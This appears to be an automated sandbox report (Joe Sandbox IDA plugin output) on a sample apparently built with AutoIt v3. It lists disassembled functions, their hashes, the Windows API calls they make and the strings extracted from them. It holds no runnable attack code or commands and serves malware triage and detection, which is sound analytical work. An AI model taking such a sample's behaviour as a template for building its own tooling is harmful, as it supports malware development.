Opcode ID: 45141a1d4a0f9c3a0c1d3cf5fb490a1269dbba655d1e844677d402b3ea6a483a
Instruction ID: 0ac4b576d177c360a8516bd54c819cf822f2191759c6bc33d5c6f522bd2eae08
Opcode Fuzzy Hash: 45141a1d4a0f9c3a0c1d3cf5fb490a1269dbba655d1e844677d402b3ea6a483a
Instruction Fuzzy Hash: 07D05E322A050EAFEF018FA4DC01EAE3B69EB04B01F408111FE15D50A1C775E835AB60

Function 00E62230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00E62242

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c7d7907e4aa465effcbf0d0abf55d862e8afb6e1cc65396c37421a86b2c05854
Instruction ID: ee30646f3b180a81cf7a5dbcd0ee33284a45fe3be113c6c5958f786790ee07c8
Opcode Fuzzy Hash: c7d7907e4aa465effcbf0d0abf55d862e8afb6e1cc65396c37421a86b2c05854
Instruction Fuzzy Hash: 1EC048F1C00109DBDB06DBA0EA88DEEB7BCAB08304F2440A6E142F2100E774AB488A71

Function 00E4A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E4A36A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 06622499d17d77aea29aa9d06199d912a7c31653a75a71c66c1dbbf42aab2df4
Instruction ID: 967e2a5257d80cb0f569b070f9009a222c414fea8902e0f242f61f9510386ce3
Opcode Fuzzy Hash: 06622499d17d77aea29aa9d06199d912a7c31653a75a71c66c1dbbf42aab2df4
Instruction Fuzzy Hash: 97A0113000020CAB8F002B82EC08888BFACEB0A2A0B008020F80C800228B32A8288A80

Function 00E38A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38745bcb3c6c58cef63f34d5f7c4f31c92bc8dd0923ac44c20f89c9bef4e2f27
Instruction ID: f81ef0d4fb6b2ea7ede754efe045f80567e71674c1645d22a7d1d4c65f28e6d9
Opcode Fuzzy Hash: 38745bcb3c6c58cef63f34d5f7c4f31c92bc8dd0923ac44c20f89c9bef4e2f27
Instruction Fuzzy Hash: B7221931501716CBDF288B54C5986BDFBB1FB01308F68B46AE446BB191DB709D82DB62

Function 00E42405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 367e1a44d2511216785d486e20588aa6cae9fff50e5563e5491ec653291f989b
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: E8C1A73220509309EF2D4639E43413EBAE16EA27B539A279DF4B3EB5C4FF10D569D620

Function 00E4283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 898cf59b9e80b1851a3c48d80f3ee41afacf428ff7e7a30441225613ed35567e
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 60C1A73220519309DF2D4639A43403EFBE16E927B539A279DF4B2EB5C4FF10D568E620

Function 019137A0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: df0e22e3479b3b5ba7306f9a390276b614c09773d1c63dab7463be216121f369
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 0641D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 01913690 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: a4ad28e5931b29867ab3c7ddc040393153bd120cdb3b100c09f36c7679955b4f
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 53019278A01109EFCB44DF98C5909AEF7B6FB48320F208599D809A7305E730AE81DB80

Function 01913630 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 2140a118e56060a291b774ba8046f8a94d929eed3430768e84f374d7306eac01
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 94019278A01209EFCB44DF98C5909AEF7B5FB48360F208599D809A7705E730AE81DB80

Function 01911ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00EA37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00EAF910), ref: 00EA38AF
IsWindowVisible.USER32(?), ref: 00EA38D3

Strings

SELECTSTRING, xrefs: 00EA3A8E
CURRENTTAB, xrefs: 00EA3945
ISENABLED, xrefs: 00EA38F3
GETLINE, xrefs: 00EA3C23
GETCURRENTLINE, xrefs: 00EA3B75
SENDCOMMANDID, xrefs: 00EA3C62
SHOWDROPDOWN, xrefs: 00EA3968
ISCHECKED, xrefs: 00EA3AC1
FINDSTRING, xrefs: 00EA39FE
DELSTRING, xrefs: 00EA39D1
GETLINECOUNT, xrefs: 00EA3B4E
HIDEDROPDOWN, xrefs: 00EA3988
ISVISIBLE, xrefs: 00EA38BF
UNCHECK, xrefs: 00EA3B0B
GETCURRENTSELECTION, xrefs: 00EA3A6B
SETCURRENTSELECTION, xrefs: 00EA3A3E
TABLEFT, xrefs: 00EA390F
GETCURRENTCOL, xrefs: 00EA3BB0
CHECK, xrefs: 00EA3AF5
EDITPASTE, xrefs: 00EA3BE7
GETSELECTED, xrefs: 00EA3B2B
ADDSTRING, xrefs: 00EA399E
TABRIGHT, xrefs: 00EA3925

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: fe0e44f7fa0af65a45d3da40f4a7aee5067fd0fbc043b29ee3110ce5f74157e5
Instruction ID: b649b9877cac3b1b859546f4388d9a46cc1bddefc1af5d9a43d554016681e659
Opcode Fuzzy Hash: fe0e44f7fa0af65a45d3da40f4a7aee5067fd0fbc043b29ee3110ce5f74157e5
Instruction Fuzzy Hash: BBD16030604215DBCB14EF20D851A6AB7E2EF99354F11646DB8867B3A3DB31FE0ACB51

Function 00EAA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00EAA89F
GetSysColorBrush.USER32(0000000F), ref: 00EAA8D0
GetSysColor.USER32(0000000F), ref: 00EAA8DC
SetBkColor.GDI32(?,000000FF), ref: 00EAA8F6
SelectObject.GDI32(?,?), ref: 00EAA905
InflateRect.USER32(?,000000FF,000000FF), ref: 00EAA930
GetSysColor.USER32(00000010), ref: 00EAA938
CreateSolidBrush.GDI32(00000000), ref: 00EAA93F
FrameRect.USER32(?,?,00000000), ref: 00EAA94E
DeleteObject.GDI32(00000000), ref: 00EAA955
InflateRect.USER32(?,000000FE,000000FE), ref: 00EAA9A0
FillRect.USER32(?,?,?), ref: 00EAA9D2
GetWindowLongW.USER32(?,000000F0), ref: 00EAA9FD

Part of subcall function 00EAAB60: GetSysColor.USER32(00000012), ref: 00EAAB99
Part of subcall function 00EAAB60: SetTextColor.GDI32(?,?), ref: 00EAAB9D
Part of subcall function 00EAAB60: GetSysColorBrush.USER32(0000000F), ref: 00EAABB3
Part of subcall function 00EAAB60: GetSysColor.USER32(0000000F), ref: 00EAABBE
Part of subcall function 00EAAB60: GetSysColor.USER32(00000011), ref: 00EAABDB
Part of subcall function 00EAAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EAABE9
Part of subcall function 00EAAB60: SelectObject.GDI32(?,00000000), ref: 00EAABFA
Part of subcall function 00EAAB60: SetBkColor.GDI32(?,00000000), ref: 00EAAC03
Part of subcall function 00EAAB60: SelectObject.GDI32(?,?), ref: 00EAAC10
Part of subcall function 00EAAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00EAAC2F
Part of subcall function 00EAAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EAAC46
Part of subcall function 00EAAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00EAAC5B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: dbabe20c0417eaff95f1dfafe04a514452af4b9981fff29374dda9251310be5e
Instruction ID: 5310c06f19bbc8201ded9ce7e77040b557f058cd02f113351cac60fc890adf03
Opcode Fuzzy Hash: dbabe20c0417eaff95f1dfafe04a514452af4b9981fff29374dda9251310be5e
Instruction Fuzzy Hash: F4A1A371408301AFD7109FA5DC08A6B7BE9FF8E321F145B39F562AA1A1D734E848CB52

Function 00E22C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00E22CA2
DeleteObject.GDI32(00000000), ref: 00E22CE8
DeleteObject.GDI32(00000000), ref: 00E22CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00E22CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00E22D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E5C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E5C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E5CAED

Part of subcall function 00E21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E22036,?,00000000,?,?,?,?,00E216CB,00000000,?), ref: 00E21B9A

SendMessageW.USER32(?,00001053), ref: 00E5CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E5CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E5CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E5CB62

Strings

0, xrefs: 00E5C981

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 98430ebd7e289afb4c6e24e2f6da9176e57686b34719ffda27265560e12b71a9
Instruction ID: 302285a7cc9fdf096d6e4037b50427423b2d2bed73ce85b5e6f2ad426d137242
Opcode Fuzzy Hash: 98430ebd7e289afb4c6e24e2f6da9176e57686b34719ffda27265560e12b71a9
Instruction Fuzzy Hash: EA12BF30604311EFCB14CF24C895BA9BBE1BF49315F64696DE986EB262C731EC49CB91

Function 00E977BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00E977F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E978B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E978EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E97900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E97946
GetClientRect.USER32(00000000,?), ref: 00E97952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E97996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E979A5
GetStockObject.GDI32(00000011), ref: 00E979B5
SelectObject.GDI32(00000000,00000000), ref: 00E979B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E979C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E979D2
DeleteDC.GDI32(00000000), ref: 00E979DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E97A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00E97A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E97A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E97A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00E97A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E97AAE
GetStockObject.GDI32(00000011), ref: 00E97AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E97AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E97ACE

Strings

msctls_progress32, xrefs: 00E97A4F
static, xrefs: 00E97990, 00E97AA8
AutoIt v3, xrefs: 00E9793E
DISPLAY, xrefs: 00E9799B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: d328c703d35d8092d3b93541921cbdf5f0269479f083c6e999a80b454e31a6e6
Instruction ID: d4eb4966887d64b04af803981bdd1839e7959288b1da7375baef2e7d27bf61a7
Opcode Fuzzy Hash: d328c703d35d8092d3b93541921cbdf5f0269479f083c6e999a80b454e31a6e6
Instruction Fuzzy Hash: 30A18171A40219BFEB14DBA5DC8AFAE7BB9EB49710F004514FA15BB2E1C770AD04CB64

Function 00E8AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8AF89
GetDriveTypeW.KERNEL32(?,00EAFAC0,?,\\.\,00EAF910), ref: 00E8B066
SetErrorMode.KERNEL32(00000000,00EAFAC0,?,\\.\,00EAF910), ref: 00E8B1C4

Strings

Unknown, xrefs: 00E8B086, 00E8B12A
1394, xrefs: 00E8B146
Network, xrefs: 00E8B0A4
CDROM, xrefs: 00E8B09A
PhysicalDrive, xrefs: 00E8B012
\\.\, xrefs: 00E8AFDB
Virtual, xrefs: 00E8B18C
ATAPI, xrefs: 00E8B138
SCSI, xrefs: 00E8B131
MMC, xrefs: 00E8B185
USB, xrefs: 00E8B15B
SSD, xrefs: 00E8B0F1
SSA, xrefs: 00E8B14D
SATA, xrefs: 00E8B177
Fixed, xrefs: 00E8B0AE
Fibre, xrefs: 00E8B154
Removable, xrefs: 00E8B0B8
RAMDisk, xrefs: 00E8B090
RAID, xrefs: 00E8B162
FileBackedVirtual, xrefs: 00E8B193
iSCSI, xrefs: 00E8B169
SAS, xrefs: 00E8B170
ATA, xrefs: 00E8B13F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 89e8857985761e9588c89e4deb32a85b19be92cf397fa4aeae29308437900198
Instruction ID: 958be63d1ec0c8f00c34261284c38ef7cf820ecd17732e36edc0842f8c3e1d52
Opcode Fuzzy Hash: 89e8857985761e9588c89e4deb32a85b19be92cf397fa4aeae29308437900198
Instruction Fuzzy Hash: B351A130785305EBCB14FB50C9A69BD73B0EB54345B687027E41EBB292CB75AE42DB42

Function 00E26A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E26A91
__wcsnicmp.LIBCMT ref: 00E26AA9
__wcsnicmp.LIBCMT ref: 00E26AC1
__wcsnicmp.LIBCMT ref: 00E26AD9
__wcsnicmp.LIBCMT ref: 00E26AF1
__wcsnicmp.LIBCMT ref: 00E26B09
__wcsnicmp.LIBCMT ref: 00E26B21
__wcsnicmp.LIBCMT ref: 00E26B35
__wcsnicmp.LIBCMT ref: 00E26B76
__wcsnicmp.LIBCMT ref: 00E26B8A
__wcsnicmp.LIBCMT ref: 00E26B9E
__wcsnicmp.LIBCMT ref: 00E26BB2

Strings

#notrayicon, xrefs: 00E26AA3
#cs, xrefs: 00E26B2F, 00E26B84
#pragma compile, xrefs: 00E26A8B
Unterminated group of comments, xrefs: 00E5E82C
#OnAutoItStartRegister, xrefs: 00E26AD3
#ce, xrefs: 00E26BAC
Cannot parse #include, xrefs: 00E5E819
#include-once, xrefs: 00E26AEB
#comments-end, xrefs: 00E26B98
#comments-start, xrefs: 00E26B1B, 00E26B70
Bad directive syntax error, xrefs: 00E5E743
#include, xrefs: 00E26B03
#requireadmin, xrefs: 00E26ABB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 2986bc56ce7591873753ac66de3ffd5c62c7fa2f9cdf7085b77f313e8df98826
Instruction ID: 6271e396d70ddcd6e882af600f279ff334d0c7d4e98bf183b6e1bebe389bae6b
Opcode Fuzzy Hash: 2986bc56ce7591873753ac66de3ffd5c62c7fa2f9cdf7085b77f313e8df98826
Instruction Fuzzy Hash: 5D813CB0640325BACF24AF60ED82FEF77A8AF15304F047125FD45BA182EB60EB59D251

Function 00EAAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00EAAB99
SetTextColor.GDI32(?,?), ref: 00EAAB9D
GetSysColorBrush.USER32(0000000F), ref: 00EAABB3
GetSysColor.USER32(0000000F), ref: 00EAABBE
CreateSolidBrush.GDI32(?), ref: 00EAABC3
GetSysColor.USER32(00000011), ref: 00EAABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EAABE9
SelectObject.GDI32(?,00000000), ref: 00EAABFA
SetBkColor.GDI32(?,00000000), ref: 00EAAC03
SelectObject.GDI32(?,?), ref: 00EAAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00EAAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EAAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00EAAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EAACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EAACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00EAACEC
DrawFocusRect.USER32(?,?), ref: 00EAACF7
GetSysColor.USER32(00000011), ref: 00EAAD05
SetTextColor.GDI32(?,00000000), ref: 00EAAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EAAD21
SelectObject.GDI32(?,00EAA869), ref: 00EAAD38
DeleteObject.GDI32(?), ref: 00EAAD43
